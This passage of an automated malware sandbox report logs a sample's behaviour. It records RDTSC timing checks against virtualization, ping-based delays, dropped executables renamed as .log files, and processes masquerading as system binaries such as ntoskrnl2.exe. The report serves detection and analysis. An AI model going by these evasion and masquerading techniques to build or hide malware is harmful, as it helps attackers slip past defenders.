                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\active key.exeRDTSC instruction interceptor: First address: 7FF6E98B6EAA second address: 7FF6E98B6EB0 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 dec ecx 0x00000004 bswap ebx 0x00000006 rdtsc
                    Uses ping.exe to sleep
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: A70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1A8B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: 14F0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: 1B200000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: AD0000 memory reserve | memory write watch
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeMemory allocated: 1A7D0000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1070000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1AF40000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: F90000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: 1ADD0000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 29A0000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 14B0000 memory reserve | memory write watch
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599885
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599781
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599672
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599562
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599426
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599267
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599141
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598940
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 3600000
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598828
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598609
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598500
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598390
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598280
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598159
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598047
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597935
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597827
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597605
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597500
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597383
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597272
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597156
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597044
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596934
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596806
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596701
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596594
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596469
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596341
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596234
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596123
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595999
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595890
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595776
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595672
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595547
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595437
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595317
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595200
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595078
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594968
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594855
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594748
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594535
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593589
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593484
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 592930
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3267Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3082Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3627
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3315
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2757
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2634
                    Source: C:\Windows\System32\ntoskrnl2.exeWindow / User API: threadDelayed 4324
                    Source: C:\Windows\System32\ntoskrnl2.exeWindow / User API: threadDelayed 5459
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\DnHERPdP.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZHsakaRB.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\mlzPodne.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\aAtQiRdB.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\hCHhiobl.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeDropped PE file which has not been started: C:\Users\user\Desktop\UZXJUHSP.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 5732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 3267 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep count: 3082 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 3627 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep count: 3315 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep count: 2757 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 2634 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 7556Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -45194522980588373s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599885s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599781s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599672s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599562s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599426s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599267s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599141s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598940s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 3248Thread sleep time: -3600000s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598828s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598719s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598609s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598500s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598390s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598280s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598159s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598047s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597935s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597827s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597719s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597605s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597500s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597383s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597272s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597156s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597044s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596934s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596806s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596701s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596594s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596469s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596341s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596234s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596123s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595999s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595890s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595776s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595672s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595547s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595437s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595317s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595200s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595078s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594968s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594855s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594748s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594535s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -593719s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -593589s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -593484s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -592930s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe TID: 8168Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\ntoskrnl2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
